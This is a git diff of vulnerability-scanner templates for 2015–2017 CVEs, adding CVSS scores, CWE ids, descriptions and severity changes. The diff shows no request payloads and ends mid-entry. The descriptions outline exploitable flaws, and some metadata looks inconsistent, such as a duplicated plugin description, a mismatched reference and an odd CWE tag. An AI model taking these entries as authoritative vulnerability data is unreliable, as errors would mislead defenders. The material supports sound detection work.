+7,11 @@ info: description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 tags: cve,cve2015,xss,sourcebans + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-8349 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index dbe4e9c097..55ff02a7c7 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml @@ -6,6 +6,11 @@ info: description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 35e2bc110b..d9b0c56e21 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -9,6 +9,11 @@ info: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 tags: cve,cve2015,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d5c3fea0f8..d65a7b2262 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 tags: cve,cve2015,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-9414 + cwe-id: CWE-79 + description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index bcd3d48d4d..aff9aca94d 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -8,6 +8,12 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 676d804499..55a0fb1e4e 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml @@ -7,6 +7,10 @@ info: reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html severity: high tags: cve,cve2016,adobe,aem + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-0957 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 0d3a928804..7570661517 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000126 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 459e6c5829..51c400aa1e 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin ajax-random-post v2.00 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index b0abb144a2..9e8645e466 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000128 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 9b0f14449b..fbeb35821b 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000129 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 18141078b1..04c6324c51 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000130 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index a9c8dcbf8d..f9e0d4a700 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin e-search v1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index fa9404875a..c33a51fe7a 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000132 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 48e7531114..64968b022f 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 99d42687c9..d11a917306 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index 48480b29c5..5fbb768196 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000135 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index 12a3ce8d62..eb4ae2195c 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000137 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index b92f330cd6..ee73a4ce9f 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000138 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin indexisto v1.0.5" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index 05a6a6285a..b3ff2bbb88 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000139 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index 8f25cbc37c..32a78c7534 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000140 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index b45691d8da..4d9e921b14 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000146 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index fbb5d33d47..7340d0b0c2 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000148 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin s3-video v0.983" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index b5e0487209..7998ec03d5 100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 2dd82e5904..d44cabdaa9 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000152 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index e1ae1a74aa..8e9ef8b66c 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000153 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin tidio-gallery v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index c459fd33e9..dfbff06092 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin whizz v1.0. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000154 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 4772141fcf..70f109f44c 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000155 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" requests: - method: GET diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 479d0f70f3..ff51ed5643 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -2,10 +2,15 @@ id: CVE-2016-10033 info: name: Wordpress 4.6 Remote Code Execution author: princechaddha - severity: high + severity: critical description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html tags: wordpress,cve,cve2016,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 4134b4a8b4..e70c75ed3a 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -9,6 +9,11 @@ info: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 tags: cve,cve2016,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-10956 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 9f3466faaa..7d70ef5104 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -3,13 +3,18 @@ id: CVE-2016-10960 info: name: wSecure Lite < 2.4 - Remote Code Execution (RCE) author: daffainfo - severity: critical + severity: high description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 5dcf8191cd..0f3716e9fe 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -8,6 +8,12 @@ info: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 tags: cve,cve2016,wordpress,wp-theme,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2016-10993 + cwe-id: CWE-79 + description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 639320dfc8..8111ac538d 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-2004 + cwe-id: CWE-306 network: - inputs: diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index a65ee5deea..364e21e9ba 100644 --- a/cves/2016/CVE-2016-2389.yaml +++ b/cves/2016/CVE-2016-2389.yaml @@ -9,6 +9,11 @@ info: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 tags: cve,cve2016,lfi,sap + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-2389 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 26b9577ef4..86662795dc 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -10,6 +10,11 @@ info: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html tags: cve,cve2016,struts,rce,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2016-3081 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 2238126a04..40868caf7e 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -7,6 +7,11 @@ info: description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-5649 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 964fdfed40..fddddf2586 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -3,12 +3,17 @@ id: CVE-2016-6277 info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu - severity: critical + severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-6277 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 686d2c2635..0e56752878 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -7,6 +7,11 @@ info: description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 tags: cve,cve2016,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-7552 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index 9f543433f5..a15b21c00b 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 tags: cve,cve2016,xss,spip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-7981 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index 7dc6d15282..c1eb936feb 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -7,6 +7,11 @@ info: description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. reference: https://www.exploit-db.com/exploits/45196 tags: cve,cve2017,oracle,glassfish,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index cb3e001dd0..ef6415afce 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal tags: cve,cve2017,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 requests: - method: POST diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 16dc0d9801..d7a07c5e57 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -11,6 +11,11 @@ info: - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 tags: cve,cve2017,primetek,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-1000486 + cwe-id: CWE-326 requests: - raw: diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index 34dde57e91..d7eb8e1003 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -3,10 +3,14 @@ id: CVE-2017-10075 info: name: Oracle Content Server XSS author: madrobot - severity: medium + severity: high description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site. reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html tags: cve,cve2017,xss,oracle + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2017-10075 requests: - method: GET diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 26de578c10..1e9b5d37af 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -9,6 +9,10 @@ info: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc tags: cve,cve2017,rce,oracle,weblogic + classification: + cvss-metrics: 